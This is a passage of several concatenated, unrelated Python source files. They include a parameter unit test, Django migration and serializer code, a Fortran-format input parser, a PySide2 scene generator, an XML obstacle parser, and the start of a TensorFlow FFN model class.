members = [
c
]
)
compoundCompoundReason = cc.valueValid( CompoundObject( { "c" : { "i" : IntData( 20 ) } } ) )[1]
self.assertEqual( compoundCompoundReason, "c.i : " + childReason )
def testAdoptChildPresets( self ) :
# backward compatible behaviour
c = CompoundParameter(
"c",
members = [
IntParameter(
"a",
"description",
1,
presets = (
( "one", 1 ),
( "two", 2 ),
),
presetsOnly = True,
),
IntParameter(
"b",
"description",
1,
presets = (
( "one", 1 ),
( "two", 2 ),
),
presetsOnly = True,
),
],
)
self.assertEqual( len( c.getPresets() ), 2 )
self.assertEqual( c.presetsOnly, True )
# no adoption of presets
c = CompoundParameter(
"c",
members = [
IntParameter(
"a",
"description",
1,
presets = (
( "one", 1 ),
( "two", 2 ),
),
presetsOnly = True,
),
IntParameter(
"b",
"description",
1,
presets = (
( "one", 1 ),
( "two", 2 ),
),
presetsOnly = True,
),
],
adoptChildPresets = False,
)
self.assertEqual( len( c.getPresets() ), 0 )
self.assertEqual( c.presetsOnly, False )
# no adoption of presets without use of keyword parameters
c = CompoundParameter(
"c",
"description",
[
IntParameter(
"a",
"description",
1,
presets = (
( "one", 1 ),
( "two", 2 ),
),
presetsOnly = True,
),
IntParameter(
"b",
"description",
1,
presets = (
( "one", 1 ),
( "two", 2 ),
),
presetsOnly = True,
),
],
CompoundObject( { "ud" : IntData( 10 ) } ),
False,
)
self.assertEqual( len( c.getPresets() ), 0 )
self.assertEqual( c.presetsOnly, False )
self.assertEqual( c.userData()["ud"].value, 10 )
# when adoptChildPresets we can also set presets explicitly...
c['a'].setValue("one")
c['b'].setValue("two")
p1 = c.getValue().copy()
c['a'].setValue("two")
c['b'].setValue("one")
p2 = c.getValue().copy()
c.setValue( c.defaultValue )
c.setPresets(
[
( "p1", p1 ),
( "p2", p2 ),
]
)
pr = c.getPresets()
self.assertEqual( len( pr ), 2 )
self.assertEqual( pr["p1"], p1 )
self.assertEqual( pr["p2"], p2 )
self.assertEqual( c.presetNames(), ( "p1", "p2" ) )
c.setValue("p1")
self.assertEqual( c.getValue(), p1 )
c.setValue("p2")
self.assertEqual( c.getValue(), p2 )
def testDerivingInPython( self ) :
class DerivedCompoundParameter( CompoundParameter ) :
def __init__( self, name, description, userData = None ) :
CompoundParameter.__init__( self, name, description, userData = userData )
registerRunTimeTyped( DerivedCompoundParameter )
c = CompoundParameter()
c.addParameter( DerivedCompoundParameter( "d", "" ) )
c["d"].addParameter( IntParameter( "i", "", 1 ) )
self.assertEqual( c.parameterPath( c["d"]["i"] ), [ "d", "i" ] )
if __name__ == "__main__":
unittest.main()
|
#!c:\users\30026663\desktop\learn\c9b1~1\sayt1\sayt1\venv\venv\scripts\python.exe
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
|
from ..en_PH import Provider as EnPhInternetProvider
class Provider(EnPhInternetProvider):
"""No difference from Internet Provider for en_PH locale"""
pass
|
import random
import math, numpy
import json
import time
from PySide2 import QtCore, QtGui, QtWidgets
from human import Human, Head
from robot import Robot
from midPoint import MidPoint
from regularobject import RegularObject
from irregularobject import IrregularObject
from room import Room
from interaction import Interaction
MAX_GENERATION_WAIT = 1.
class WorldGenerator(QtWidgets.QGraphicsScene):
available_identifier = 0
def __init__(self, data=None):
super(WorldGenerator, self).__init__()
self.setSceneRect(-400, -400, 800 - 2, 800 - 2)
self.setItemIndexMethod(QtWidgets.QGraphicsScene.NoIndex)
if data is None:
self.generateRandomWorld()
else:
self.generateFromData(data)
def generateFromData(self, raw_data):
data = json.loads(raw_data)
idMap = dict()
self.clear()
self.ds_identifier = int(data['identifier'].split()[0])
self.room = Room(data['room'])
self.addItem(self.room)
self.humans = []
for raw_human in data['humans']:
human = Human.from_json(raw_human)
self.addItem(human)
self.humans.append(human)
idMap[raw_human['id']] = human
self.heads = []
for raw_head in data['heads']:
head = Head.from_json(raw_head)
self.addItem(head)
self.heads.append(head)
idMap[raw_head['id']] = head
self.objects = []
for raw_object in data['objects']:
obj = RegularObject.from_json(raw_object)
self.addItem(obj)
self.objects.append(obj)
idMap[raw_object['id']] = obj
self.interactions = []
interactions_done = []
for interaction_raw in data['links']:
if not [interaction_raw[1], interaction_raw[0], interaction_raw[2]] in interactions_done:
interactions_done.append(interaction_raw)
human = idMap[interaction_raw[0]]
other = idMap[interaction_raw[1]]
interaction = Interaction(human, other)
self.interactions.append(interaction)
self.addItem(interaction)
#self.irregularobjects = []
#for raw_irregularobjects in data['irregularobjects']:
#obj = IrregularObject.from_json(raw_irregularobjects)
#self.addItem(obj)
#self.irregularobjects.append(obj)
#idMap[raw_irregularobjects['id']] = obj
self.robot = Robot()
self.robot.setPos(0, 0)
self.addItem(self.robot)
def generateRandomWorld(self):
done = False
self.ds_identifier = WorldGenerator.available_identifier
WorldGenerator.available_identifier += 1
while not done:
try:
self.generation_time = time.time()
self.generate()
done = True
# print(time.time()-self.generation_time)
except RuntimeError:
pass
@staticmethod
def distanceTo(something):
return int(math.sqrt(something.xPos*something.xPos + something.yPos*something.yPos))
@staticmethod
def angleTo(something):
angle = int(int(180.*math.atan2(something.yPos, something.xPos)/math.pi)+90.)
if angle > 180.: angle = -360.+angle
return angle
def serialize(self, score=-1):
structure = dict()
structure['identifier'] = str(self.ds_identifier).zfill(5) + ' A'
structure['score'] = 0
if score > 0:
structure['score'] = score
structure['robot'] = {'id': 0}
humansList = []
for human in self.humans:
h = dict()
h['id'] = human.id
h['xPos'] = +human.xPos
h['yPos'] = +human.yPos
h['orientation'] = +human.angle
h['head_orientation'] = +human.angleHead
humansList.append(h)
structure['humans'] = humansList
headsList = []
for head in self.heads:
h = dict()
h['id'] = head.id
h['xPos'] = +head.xPos
h['yPos'] = +head.yPos
h['orientation'] = +head.angle
headsList.append(h)
structure['heads'] = headsList
objectsList = []
for object in self.objects:
o = dict()
o['id'] = object.id
o['xPos'] = +object.xPos
o['yPos'] = +object.yPos
o['orientation'] = +object.angle
objectsList.append(o)
structure['objects'] = objectsList
structure['links'] = []
for interaction in self.interactions:
structure['links'].append( [interaction.a.id, interaction.b.id, 'interact'] )
if type(interaction.b) is Human:
structure['links'].append( [interaction.b.id, interaction.a.id, 'interact'] )
#irregularObjectsList = []
#for object in self.irregularobjects:
#o = dict()
#o['id'] = object.id
#o['xPos'] = +object.xPos
#o['yPos'] = +object.yPos
#o['w'] = +object.w
#o['h'] = +object.h
#o['orientation'] = +object.angle
#irregularObjectsList.append(o)
#structure['irregularobjects'] = irregularObjectsList
structure['room'] = [ [+point.x(), point.y()] for point in self.room.poly ]
if score >= 0:
print(json.dumps(structure))
return structure
def generateHuman(self, availableId):
human = None
while human is None:
if time.time() - self.generation_time > MAX_GENERATION_WAIT:
raise RuntimeError('MAX_GENERATION_ATTEMPTS')
if QtCore.qrand() % 3 == 0:
xx = int(random.normalvariate(0, 150))
yy = int(random.normalvariate(0, 150))
else:
xx = QtCore.qrand()%800-400
yy = QtCore.qrand()%800-400
angleHuman = (QtCore.qrand()%360)-180
angleHead = angleHuman + random.choice([-1,1])*QtCore.qrand()%100
human = Human(availableId, xx, yy, angleHuman, angleHead)
if not self.room.containsPolygon(human.polygon()):
human = None
return human
def generateComplementaryHuman(self, human, availableId):
a = math.pi*human.angle/180.
dist = float(QtCore.qrand()%300+50)
human2 = None
while human2 is None:
if time.time() - self.generation_time > MAX_GENERATION_WAIT:
raise RuntimeError('MAX_GENERATION_ATTEMPTS')
xPos = human.xPos+dist*math.sin(a)
yPos = human.yPos-dist*math.cos(a)
human2 = Human(availableId, xPos, yPos, human.angle+180)
if not self.room.containsPolygon(human2.polygon()):
dist -= 5
if dist < 20:
human.setAngle(human.angle+180)
a = math.pi*human.angle/180.
dist = float(QtCore.qrand()%300+50)
human2 = None
return human2
#def generateHumanHead(self, human):
#head = None
#while head is None:
##print ("human.angle", human.angle)
#angle = human.angle + random.choice([-1,1])*QtCore.qrand()%100
#if angle > 180.: angle = -360. + angle
#if angle < -180.: angle = angle + 360
#head = Head(human.id, human.xPos, human.yPos, angle)
##if -180 <= a <= 180:
#return head
def generateComplementaryObject(self, human, availableId):
a = math.pi*human.angle/180.
dist = float(QtCore.qrand()%250+50)
obj = None
while obj is None:
if time.time() - self.generation_time > MAX_GENERATION_WAIT:
raise RuntimeError('MAX_GENERATION_ATTEMPTS')
xPos = human.xPos+dist*math.sin(a)
yPos = human.yPos-dist*math.cos(a)
obj = RegularObject(availableId, xPos, yPos, (human.angle+180)%360)
if not self.room.containsPolygon(obj.polygon()):
dist -= 5
if dist <= 5:
obj.setAngle(human.angle+180)
a = math.pi*human.angle/180.
dist = float(QtCore.qrand()%300+50)
obj = None
return obj
def generateInteractuatorHuman(self, human, availableId):
a = math.pi*human.angle/180. #a radianes
dist = float(QtCore.qrand()%300+50)
human2 = None
while human2 is None:
if time.time() - self.generation_time > MAX_GENERATION_WAIT:
raise RuntimeError('MAX_GENERATION_ATTEMPTS')
xPos = human.xPos+dist*math.sin(a)
yPos = human.yPos-dist*math.cos(a)
l = [1,-1]
option = random.choice (l)
angle = human.angle+180 + (option*QtCore.qrand()%25)
# print('angle human2:', angle)
if angle > 180.: angle = -360. + angle
# print('angle human2 normalize:', angle)
angleHead = angle + random.choice([-1,1])*QtCore.qrand()%100
human2 = Human(availableId, xPos, yPos, angle,angleHead)
if not self.room.containsPolygon(human2.polygon()):
dist -= 5
if dist < 20:
human.setAngle(human.angle+180)
a = math.pi*human.angle/180.
dist = float(QtCore.qrand()%300+50)
human2 = None
return human2
def generateObject(self, availableId):
object = None
while object is None:
if time.time() - self.generation_time > MAX_GENERATION_WAIT:
raise RuntimeError('MAX_GENERATION_ATTEMPTS')
if QtCore.qrand() % 3 == 0:
xx = int(random.normalvariate(0, 150))
yy = int(random.normalvariate(0, 150))
else:
xx = QtCore.qrand()%800-400
yy = QtCore.qrand()%800-400
object = RegularObject(availableId, xx, yy, (QtCore.qrand()%360)-180)
if not self.room.containsPolygon(object.polygon()):
object = None
return object
def generateIrregularObject(self, availableId):
object = None
while object is None:
if time.time() - self.generation_time > MAX_GENERATION_WAIT:
raise RuntimeError('MAX_GENERATION_ATTEMPTS')
if QtCore.qrand() % 3 == 0:
xx = int(random.normalvariate(0, 150))
yy = int(random.normalvariate(0, 150))
ww = int(random.normalvariate(20, 50))
hh = int(random.normalvariate(20, 50))
else:
xx = QtCore.qrand()%800-400
yy = QtCore.qrand()%800-400
ww = QtCore.qrand()%800/4-400/4
hh = QtCore.qrand()%800/4-400/4
if (ww>10 and hh>10):
object = IrregularObject(availableId, xx, yy, ww, hh, (QtCore.qrand()%360)-180)
if object is not None:
if not self.room.containsPolygon(object.polygon()):
object = None
return object
def generate(self):
regenerateScene = True
while regenerateScene:
availableId = 1
regenerateScene = False
self.clear()
self.humans = []
self.heads = []
self.objects = []
self.interactions = []
#self.irregularobjects =[]
self.room = Room()
self.addItem(self.room)
#ONLY TWO HUMAN BEINGS
human = self.generateHuman(availableId)
head = Head (human.id, human.xPos, human.yPos, human.angleHead )
#head = self.generateHumanHead(human)
availableId += 1
self.addItem(human)
self.humans.append(human)
#heads
self.addItem(head)
#self.heads.append(head)
human2 = None
while human2 is None:
if QtCore.qrand()%2 == 0:
human2 = self.generateInteractuatorHuman(human, availableId)
#CHECK necesito crear interaccion?
# interaction = Interaction(human, human2)
# self.interactions.append(interaction)
# self.addItem(interaction)
else:
human2 = self.generateHuman(availableId)
if human.polygon().intersects(human2.polygon()):
human2=None
head2 = Head (human2.id, human2.xPos, human2.yPos, human2.angleHead )
#head2 = self.generateHumanHead(human2)
#print ("-----")
availableId += 1
self.addItem(human2)
self.humans.append(human2)
#heads
self.addItem(head2)
#self.heads.append(head2)
# Calculamos el punto medio de los dos humanos. Adri
x1 = human.xPos
y1 = human.yPos
x2 = human2.xPos
y2 = human2.yPos
x_pm = (x1 + x2)/2
y_pm = (y1 + y2)/2
punto_medio = QtCore.QPointF(x_pm, y_pm) # Coordenada x e y.
punto_human = QtCore.QPointF(x1, y1) # Coordenada humano 1
punto_human2 = QtCore.QPointF(x2, y2) # Coordenada humano 2.
a = numpy.array((x1 ,y1))
b = numpy.array((x2, y2))
dist = numpy.linalg.norm(a-b)
self.midPoint = MidPoint()
self.midPoint.setHumansPoints(punto_human,punto_human2)
self.midPoint.setMidPoint(punto_medio)
self.midPoint.setDist(dist)
self.addItem(self.midPoint)
#genero objetos regulares
# objectCount = int(abs(random.normalvariate(1, 4))) % 5
# #print ("objectCount",objectCount)
# if objectCount == 0:
# objectCount = QtCore.qrand() % 3
# for i in range(objectCount):
# # print (i)
# object = self.generateObject(availableId)
# #Chequeo sino intersecta con otro objeto ya creado
# if any (object.polygon().intersects(x.polygon()) for x in self.objects):
# continue
# #check is colide with human beings
# if any (object.polygon().intersects(x.polygon()) for x in self.humans):
# continue
# availableId += 1
# self.addItem(object)
# self.objects.append(object)
#genero objetos IRREGULARES
#objectCount = int(abs(random.normalvariate(1, 4))) % 15
## print ("irregular objects",objectCount)
#if objectCount == 0:
#objectCount = QtCore.qrand() % 3
#for i in range(objectCount):
## print (i)
#object = self.generateIrregularObject(availableId)
###check if intersect with regular IRREGULARobjects
#if any (object.polygon().intersects(x.polygon()) for x in self.irregularobjects):
#continue
##check if intersect with humans
#if any (object.polygon().intersects(x.polygon()) for x in self.humans):
#continue
##check if intersect with regular objects
#if any (object.polygon().intersects(x.polygon()) for x in self.objects):
#continue
#availableId += 1
#self.addItem(object)
#self.irregularobjects.append(object)
#print ("----Sel.irregularobjets: len", len(self.irregularobjects))
#print ("----Self.objects: len", len(self.objects))
self.robot = Robot()
self.robot.setPos(0, 0)
self.addItem(self.robot)
#self.text = 'Humans:' + str(len(self.humans)) + ' ' + 'Objects:' + str(len(self.objects))+ ' ' + 'Irregular Objects:' + str(len(self.irregularobjects))
|
import re
import pdb
import sys
IS_PYTHON3 = sys.version_info[0] >= 3
if IS_PYTHON3:
exec('from ._edit_descriptors import *')
exec('from ._misc import expand_edit_descriptors, has_next_iterator')
exec('from . import config')
else:
exec('from _edit_descriptors import *')
exec('from _misc import expand_edit_descriptors, has_next_iterator')
exec('import config')
WIDTH_OPTIONAL_EDS = [A]
NON_WIDTH_EDS = [BN, BZ, P, SP, SS, S, X, T, TR, TL, Colon, Slash]
FORBIDDEN_EDS = [QuotedString, H]
# Some problems without pre written input vars:
# Cannot say when reversion conditions are met
# Cannot determine width of A edit descriptor
# Cannot determine complex input
# Cannot determine proper input for G edit descriptors
def input(eds, reversion_eds, records, num_vals=None):
state = { \
'position' : 0,
'scale' : 0,
'incl_plus' : False,
'blanks_as_zeros' : config.PROC_BLANKS_AS_ZEROS,
# TODO: Implement halt if no more record input
'halt_if_no_vals' : False,
'exception_on_fail' : True,
}
# pdb.set_trace()
for ed in eds + reversion_eds:
if isinstance(ed, tuple(FORBIDDEN_EDS)):
raise InvalidFormat("%d edit descriptr not permitted on input")
# Expand repeated edit decriptors
eds = expand_edit_descriptors(eds)
reversion_eds = expand_edit_descriptors(reversion_eds)
# Assume one-to-one correspondance between edit descriptors and output
# values if number of output values is not defined
num_out_eds = 0
for ed in eds:
if isinstance(ed, OUTPUT_EDS):
num_out_eds += 1
num_rev_out_eds = 0
if num_vals is None:
num_vals = num_out_eds
for ed in reversion_eds:
if isinstance(ed, OUTPUT_EDS):
num_rev_out_eds += 1
# Will loop forever is no output edit descriptors
if (num_out_eds == 0):
return []
# Will loop forever if no output eds in reversion format and is more values
# requested than in the format
if (num_vals > num_out_eds) and (num_rev_out_eds == 0):
raise ValueError('Not enough output edit descriptors in reversion format to output %d values' % num_vals)
# May need to process multiple records, down to a higher function to supply
# appropriate string for format
if not hasattr(records, 'next'):
records = iter(re.split('\r\n|\r|\n', records))
record = _next(records, None)
if record is None:
return []
# if a_widths is not None:
# a_widths = itertools.cycle(a_widths)
vals = []
finish_up = False
ed_ind = -1
while True:
ed_ind += 1
# Signal to stop when Colon edit descriptor or end of format or end of
# reversion format reached. Also not to output any more data
if len(vals) >= num_vals:
finish_up = True
# Select the appropriate edit descriptor
if ed_ind < len(eds):
ed = eds[ed_ind]
else:
rev_ed_ind = (ed_ind - len(eds)) % len(reversion_eds)
# Reversion begun and has been instructed to halt
if finish_up and (rev_ed_ind == 0):
break
ed = reversion_eds[rev_ed_ind]
if isinstance(ed, QuotedString):
raise InvalidFormat('Cannot have string literal in an input format')
elif isinstance(ed, BN):
state['blanks_as_zeros'] = False
elif isinstance(ed, BZ):
state['blanks_as_zeros'] = True
elif isinstance(ed, P):
state['scale'] = ed.scale
elif isinstance(ed, SP):
state['incl_plus'] = True
elif isinstance(ed, SS):
state['incl_plus'] = False
elif isinstance(ed, S):
state['incl_plus'] = config.PROC_INCL_PLUS
elif isinstance(ed, (X, TR)):
state['position'] = min(state['position'] + ed.num_chars, len(record))
elif isinstance(ed, TL):
state['position'] = max(state['position'] - ed.num_chars, 0)
elif isinstance(ed, T):
if (ed.num_chars - 1) < 0:
state['position'] = 0
elif ed.num_chars > len(record):
state['position'] = len(record)
else:
state['position'] = ed.num_chars - 1
elif isinstance(ed, Slash):
# End of record
record = _next(records, None)
state['position'] = 0
if record is None:
break
elif isinstance(ed, Colon):
# Break if input value satisfied
if finish_up:
break
elif isinstance(ed, (Z, O, B, I)):
val, state = read_integer(ed, state, record)
vals.append(val)
elif isinstance(ed, A):
val, state = read_string(ed, state, record)
vals.append(val)
elif isinstance(ed, L):
val, state = read_logical(ed, state, record)
vals.append(val)
elif isinstance(ed, (F, E, D, EN, ES)):
val, state = read_float(ed, state, record)
vals.append(val)
elif isinstance(ed, G):
# Difficult to know what wanted since do not know type of input variable
# Use the G_INPUT_TRIAL_EDS variable to try the variables
# until one sticks
# n.b. vals and state do not get written to if
# exception id raised
resolved = False
g_trial_eds = iter(config.G_INPUT_TRIAL_EDS)
while not resolved:
ed_name = _next(g_trial_eds, '')
if ed_name.upper() in ('F', 'E', 'D', 'EN', 'ES'):
trial_ed = F()
trial_ed.width = ed.width
trial_ed.decimal_places = ed.decimal_places
# pdb.set_trace()
try:
val, state = read_float(trial_ed, state.copy(), record)
vals.append(val)
resolved = True
except ValueError:
continue
elif ed_name.upper() in ('Z', 'O', 'B', 'I'):
trial_ed = globals()[ed_name]()
trial_ed.width = ed.width
trial_ed.min_digits = ed.decimal_places
try:
val, state = read_integer(trial_ed, state.copy(), record)
vals.append(val)
resolved = True
except ValueError:
continue
elif ed_name.upper() in ('L'):
trial_ed = L()
trial_ed.width = ed.width
try:
val, state = read_logical(trial_ed, state.copy(), record)
vals.append(val)
resolved = True
except ValueError:
continue
elif ed_name.upper() in ('A'):
trial_ed = A()
trial_ed.width = ed.width
try:
val, state = read_string(trial_ed, state.copy(), record)
vals.append(val)
resolved = True
except ValueError:
continue
elif ed_name in ('G'):
raise ValueError('G edit descriptor not permitted in config.G_INPUT_TRIAL_EDS')
else:
raise ValueError('Unrecognised trial edit descriptor string in config.G_INPUT_TRIAL_EDS')
if config.RET_WRITTEN_VARS_ONLY:
vals = [val for val in vals if val is not None]
return vals[:num_vals]
def _interpret_blanks(substr, state):
# Save leading blanks
len_str = len(substr)
if state['blanks_as_zeros']:
# TODO: Are tabs blank characters?
substr = substr.replace(' ', '0')
else:
substr = substr.replace(' ', '')
# If were blanks but have been stripped away, replace with a zero
if len(substr) == 0 and (len_str > 0):
substr = '0'
return substr
def _get_substr(w, record, state):
start = max(state['position'], 0)
end = start + w
# if end > len(record):
# substr = ''
# # TODO: test if no chars transmitted, then poition does not change
# w = 0
# else:
substr = record[start:end]
state['position'] = min(state['position'] + w, len(record))
return substr, state
def _next(it, default=None):
try:
if IS_PYTHON3:
val = next(it)
else:
val = it.next()
except StopIteration:
val = default
return val
def read_string(ed, state, record):
if ed.width is None:
# Will assume rest of record is fair game for the
# unsized A edit descriptor
ed.width = len(record) - state['position']
substr, state = _get_substr(ed.width, record, state)
val = substr.ljust(ed.width, config.PROC_PAD_CHAR)
return (val, state)
def read_integer(ed, state, record):
substr, state = _get_substr(ed.width, record, state)
if ('-' in substr) and (not config.PROC_ALLOW_NEG_BOZ) and isinstance(ed, (Z, O, B)):
if state['exception_on_fail']:
raise ValueError('Negative numbers not permitted for binary, octal or hex')
else:
return (None, state)
if isinstance(ed, Z):
base = 16
elif isinstance(ed, I):
base = 10
elif isinstance(ed, O):
base = 8
elif isinstance(ed, B):
base = 2
# If a negative is followed by blanks, Gfortran and ifort
# interpret as a zero
if re.match(r'^ *- +$', substr):
substr = '0'
# If a negative or negative and blanks, ifort interprets as
# zero for an I edit descriptor
if config.PROC_NEG_AS_ZERO and isinstance(ed, I) and re.match(r'^( *- *| +)$', substr):
substr = '0'
# If string is zero length (reading off end of record?),
# interpret as zero so as to match what would be found in an
# unwritten FORTRAN variable
if substr == '':
if config.RET_UNWRITTEN_VARS_NONE or config.RET_WRITTEN_VARS_ONLY:
return (None, state)
else:
substr = '0'
teststr = _interpret_blanks(substr, state)
try:
val = int(teststr, base)
except ValueError:
if state['exception_on_fail']:
raise ValueError('%s is not a valid input for one of integer, octal, hex or binary' % substr)
else:
return (None, state)
return (val, state)
def read_logical(ed, state, record):
substr, state = _get_substr(ed.width, record, state)
# Deal with case where there is no more input to read from
if (substr == '') and (config.RET_UNWRITTEN_VARS_NONE or config.RET_WRITTEN_VARS_ONLY):
return (None, state)
# Remove preceding whitespace and take the first two letters as
# uppercase for testing
teststr = substr.upper().lstrip().lstrip('.')
if len(teststr):
teststr = teststr[0]
else:
# This is case where just a preceding period is read in
raise ValueError('%s is not a valid boolean input' % substr)
if teststr == 'T':
val = True
elif teststr == 'F':
val = False
else:
if state['exception_on_fail']:
raise ValueError('%s is not a valid boolean input' % substr)
else:
val = None
return (val, state)
def read_float(ed, state, record):
substr, state = _get_substr(ed.width, record, state)
teststr = _interpret_blanks(substr, state)
# When reading off end of record, get empty string,
# interpret as 0
if teststr == '':
if config.RET_UNWRITTEN_VARS_NONE or config.RET_WRITTEN_VARS_ONLY:
return (None, state)
else:
teststr = '0'
# Python only understands 'E' as an exponential letter
teststr = teststr.upper().replace('D', 'E')
# Prepend an exponential letter if only a '-' or '+' denotes an exponent
if 'E' not in teststr:
teststr = teststr[0] + teststr[1:].replace('+', 'E+').replace('-', 'E-')
# ifort allows '.' to be interpreted as 0
if re.match(r'^ *\. *$', teststr):
teststr = '0'
# ifort allows '-' to be interpreted as 0
if re.match(r'^ *- *$', teststr):
teststr = '0'
# ifort allows numbers to end with 'E', 'E+', 'E-' and 'D'
# equivalents
res = re.match(r'(.*)(E|E\+|E\-)$', teststr)
if res:
teststr = res.group(1)
try:
val = float(teststr)
except ValueError:
if state['exception_on_fail']:
raise ValueError('%s is not a valid input as for an E, ES, EN or D edit descriptor' % substr)
else:
return (None, state)
# Special cases: insert a decimal if none specified
if ('.' not in teststr) and (ed.decimal_places is not None):
val = val / 10 ** ed.decimal_places
# Apply scale factor if exponent not supplied
if 'E' not in teststr:
val = val / 10 ** state['scale']
return (val, state)
|
# Generated by Django 3.1.5 on 2021-02-09 12:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('subjects', '0003_auto_20210209_1218'),
('teachers', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='teacher',
name='subjects',
field=models.ManyToManyField(to='subjects.Subject'),
),
]
|
from core.models import PokedexCreature, Pokemon
from django.conf import settings
from rest_framework import serializers
class PokedexCreatureSerializer(serializers.ModelSerializer):
"""Serializer of PokedexCreature object"""
class Meta:
model = PokedexCreature
fields = (
"id",
"name",
"type_1",
"type_2",
"generation",
"legendary",
)
read_only_fields = ("id",)
class PokedexCreatureDetailSerializer(serializers.ModelSerializer):
"""Serializer to retrieve detail of PokedexCreature object"""
class Meta:
model = PokedexCreature
fields = "__all__"
read_only_fields = ("id",)
class UserSerializer(serializers.ModelSerializer):
"""Serializer to retrieve an user"""
class Meta:
model = settings.AUTH_USER_MODEL
fields = ["id", "username", "email"]
class PokemonSerializer(serializers.ModelSerializer):
"""Serializer of Pokemon object"""
pokedex_creature = PokedexCreatureDetailSerializer
trainer = UserSerializer
class Meta:
model = Pokemon
fields = (
"id",
"pokedex_creature",
"trainer",
"surname",
"level",
"experience",
)
read_only_fields = ("id", "level", "experience")
def validate(self, attrs):
"""Add pokemon surname if no surname is given"""
surname = attrs.get("surname")
pokedex_creature = attrs.get("pokedex_creature")
if not surname:
attrs["surname"] = pokedex_creature.name
return super().validate(attrs)
|
import xml.etree.ElementTree as ET
import pandas as pd
import numpy as np
'''
Parse relevant obstacle info from world file
input : path to the worl file
output : panda dataframe structured as follow
Reference | Name | Position | Size
Reference : Which obstacle it is
Name : Name of the part of the obstacle
Position : Position of the center of the part of the obstacle (x,y,z,yaw,pitch,roll)
Size : Size of the part of the obstacle (x,y,z)
Examples:
For first part of wall1
Reference is 1
Name wall1_1*1.5_1
Position 1.0 3.0 0.75 0 -0 0
Size 1 0.2 1.5
For second part of wall2
Reference is 2
Name wall2_1.0*0.2_1
Position 4.5 6.0 0.1 0 -0 0
Size 2.0 0.2 0.2
Pandas API : https://pandas.pydata.org/pandas-docs/stable/reference/index.html
'''
def parse_obstacles(filename):
tree = ET.parse(filename)
root = tree.getroot()
obstacles = pd.DataFrame()
#get obstacles names
models = tree.findall('world/model')
for m in models:
if 'wall' in str(m.attrib):
name = str(m.attrib).split("'")[3]
ref = name[4]
df = pd.concat([pd.DataFrame([ref]), pd.DataFrame([name])], axis=1, sort=False)
obstacles = pd.concat([obstacles, df])
#get obstacles positions
poses = tree.findall('world/model/pose')
df = pd.DataFrame()
for p in poses:
df = pd.concat([df, pd.DataFrame([p.text])], axis=0, sort=False)
obstacles = pd.concat([obstacles, df], axis=1, sort=False)
#get obstacles sizes
sizes = tree.findall('world/model/link/visual/geometry/box/size')
df = pd.DataFrame()
for s in sizes:
df = pd.concat([df, pd.DataFrame([s.text])], axis=0, sort=False)
obstacles = pd.concat([obstacles, df], axis=1, sort=False)
obstacles.columns = ['Reference', 'Name', 'Position', 'Size']
obstacles.reset_index(drop=True, inplace=True)
return(obstacles)
def transfertype(datalist):
templist = [] #store the final list
for i in range(len(datalist)):
tempdata = datalist[i] #The string date
tempdatastr = tempdata.split() #The string list data
tempdataint = [] #Transfer str to int
for j in range(len(tempdatastr)):
tempdataint.append(float(tempdatastr[j]))
templist.append(tempdataint)
return templist
def createObs(center, size):
pos = []
obs = []
for i in range(len(center)):
temppos = (center[i][0], center[i][1], center[i][2])
tempobs = (center[i][0] - size[i][0]/2, center[i][1] - size[i][1]/2, center[i][2] - size[i][2]/2,
center[i][0] + size[i][0]/2, center[i][1] + size[i][1]/2, center[i][2] + size[i][2]/2)
pos.append(temppos)
obs.append(tempobs)
return pos, obs
if __name__ == "__main__":
obstacles = parse_obstacles('world_test.world')
print(obstacles)
obscenter = obstacles['Position'].values.tolist()
obssize = obstacles['Size'].values.tolist()
obscenter_ = transfertype(obscenter)
obssize_ = transfertype(obssize)
pos, obs = createObs(obscenter_, obssize_)
# print(obscenter_)
# print(obssize_)
print(pos)
print(obs)
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Classes for FFN model definition."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from . import optimizer
class FFNModel(object):
"""Base class for FFN models."""
# Dimensionality of the model (2 or 3).
dim = None
############################################################################
# (x, y, z) tuples defining various properties of the network.
# Note that 3-tuples should be used even for 2D networks, in which case
# the third (z) value is ignored.
# How far to move the field of view in the respective directions.
deltas = None
# Size of the input image and seed subvolumes to be used during inference.
# This is enough information to execute a single prediction step, without
# moving the field of view.
input_image_size = None
input_seed_size = None
# Size of the predicted patch as returned by the model.
pred_mask_size = None
###########################################################################
# TF op to compute loss optimized during training. This should include all
# loss components in case more than just the pixelwise loss is used.
loss = None
# TF op to call to perform loss optimization on the model.
train_op = None
def __init__(self, deltas, batch_size=None, define_global_step=True):
assert self.dim is not None
self.deltas = deltas
self.batch_size = batch_size
# Initialize the shift collection. This is used during training with the
# fixed step size policy.
self.shifts = []
for dx in (-self.deltas[0], 0, self.deltas[0]):
for dy in (-self.deltas[1], 0, self.deltas[1]):
for dz in (-self.deltas[2], 0, self.deltas[2]):
if dx == 0 and dy == 0 and dz == 0:
continue
self.shifts.append((dx, dy, dz))
if define_global_step:
self.global_step = tf.Variable(0, name='global_step', trainable=False)
# The seed is always a placeholder which is fed externally from the
# training/inference drivers.
self.input_seed = tf.placeholder(tf.float32, name='seed')
self.input_patches = tf.placeholder(tf.float32, name='patches')
# For training, labels should be defined as a TF object.
self.labels = None
# Optional. Provides per-pixel weights with which the loss is multiplied.
# If specified, should have the same shape as self.labels.
self.loss_weights = None
self.logits = None # type: tf.Operation
# List of image tensors to save in summaries. The images are concatenated
# along the X axis.
self._images = []
def set_uniform_io_size(self, patch_size):
"""Initializes unset input/output sizes to 'patch_size', sets input shapes.
This assumes that the inputs and outputs are of equal size, and that exactly
one step is executed in every direction during training.
Args:
patch_size: (x, y, z) specifying the input/output patch size
Returns:
None
"""
if self.pred_mask_size is None:
self.pred_mask_size = patch_size
if self.input_seed_size is None:
self.input_seed_size = patch_size
if self.input_image_size is None:
self.input_image_size = patch_size
self.set_input_shapes()
def set_input_shapes(self):
"""Sets the shape inference for input_seed and input_patches.
Assumes input_seed_size and input_image_size are already set.
"""
self.input_seed.set_shape([self.batch_size] +
list(self.input_seed_size[::-1]) + [1])
self.input_patches.set_shape([self.batch_size] +
